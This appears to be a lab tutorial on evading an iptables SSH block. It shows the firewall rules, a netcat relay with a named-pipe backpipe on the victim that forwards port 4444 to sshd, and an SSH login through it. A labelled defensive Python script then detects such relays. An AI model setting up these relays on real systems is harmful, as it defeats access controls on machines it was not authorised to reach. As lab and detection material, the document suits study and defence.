Bypassing Firewall with Forward Relays

Lab Setup

Block incoming TCP packets to port 22 from the attacker on the victim machine

sudo iptables -A INPUT -s <attacker ip> -p tcp --dport 22 -j DROP

Allow TCP packets from the attacker to another port (4444) on the victim machine

iptables -I INPUT 1 -s <attacker ip> -p tcp --dport 4444 -j ACCEPT

Check netcat communication between the attacker and the victim

On Victim Machine

nc -v -l -p 4444

On the Kali Machine

nc 192.168.1.7 4444


Use a Netcat Relay with a Backpipe to Access the SSH Service

The first command makes a special type of file called a FIFO, or named pipe. We call it the backpipe because it carries the responses back through the relay.

The second command starts a netcat listener on port 4444, which the firewall allows. This listener takes its standard input (0<) from the backpipe. Its standard output is piped (|) into a netcat client that connects to localhost (127.0.0.1) on TCP port 22, where sshd listens, so data arriving on 4444 is forwarded to SSH. The client's standard output (1>) is redirected into the backpipe, so sshd's replies travel back to the listener's standard input and out to the attacker. A forward path and a back path are both needed because netcat (like SSH) is two-way communication, and the source-based DROP rule on port 22 never sees this traffic: the connection to sshd originates from localhost, not from the attacker's address.

This requires existing access to the victim machine, since the relay is set up there.

Victim Machine

mknod /tmp/backpipe p
  • p: Tells mknod to create a FIFO (named pipe)

nc -l -p 4444 0</tmp/backpipe | nc localhost 22 1>/tmp/backpipe
  • -l: Listener

  • -p: Port

Attacker Machine

Access SSH Through Netcat Relay

ssh msfadmin@10.10.10.3 -p 4444
  • -p: Specifies the port (the relay's 4444 instead of SSH's default 22)
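From the defender's side, the relay above leaves two visible traces on the victim: a non-SSH program (nc) holding a loopback connection to sshd, and a FIFO sitting in /tmp. The following added example, not part of the original lab notes, checks for both; the `ss -tanp` sample, the PIDs and the allowlist of expected SSH client names are constructed assumptions.

```python
import re
import stat
from pathlib import Path

# Constructed sample of `ss -tanp` output from a host running the relay above
# (PIDs and ephemeral ports are made up for this example).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port  Process
LISTEN 0      1      0.0.0.0:4444       0.0.0.0:*          users:(("nc",pid=2311,fd=3))
ESTAB  0      0      127.0.0.1:51234    127.0.0.1:22       users:(("nc",pid=2312,fd=3))
ESTAB  0      0      127.0.0.1:22       127.0.0.1:51234    users:(("sshd",pid=2313,fd=4))
ESTAB  0      0      127.0.0.1:58888    127.0.0.1:22       users:(("ssh",pid=900,fd=3))
"""

PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')
LOOPBACK = {"127.0.0.1", "[::1]", "::1"}
EXPECTED_SSH_CLIENTS = {"ssh", "sftp", "scp"}  # assumed allowlist for this host


def loopback_ssh_clients(ss_output, ssh_port=22):
    """Return (program, pid, peer) for established sockets whose peer is
    loopback:ssh_port and whose owner is not a normal SSH client.
    The relay's `nc localhost 22` shows up here as an `nc` process."""
    findings = []
    for line in ss_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 6 or fields[0] != "ESTAB":
            continue
        peer = fields[4]
        host, _, port = peer.rpartition(":")
        if host not in LOOPBACK or port != str(ssh_port):
            continue
        m = PROC_RE.search(line)
        if m and m.group(1) not in EXPECTED_SSH_CLIENTS:
            findings.append((m.group(1), int(m.group(2)), peer))
    return findings


def fifos_in(directory):
    """List named pipes (FIFOs) in a directory; `mknod ... p` creates one."""
    return sorted(str(p) for p in Path(directory).iterdir()
                  if stat.S_ISFIFO(p.lstat().st_mode))


if __name__ == "__main__":
    for prog, pid, peer in loopback_ssh_clients(SAMPLE_SS):
        print(f"suspicious loopback SSH client: {prog} pid={pid} -> {peer}")
    print("FIFOs in /tmp:", fifos_in("/tmp"))
```

On a live host, feed the real `ss -tanp` output into `loopback_ssh_clients` and point `fifos_in` at world-writable directories; a hit on both is a strong indicator of a relay like this one.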
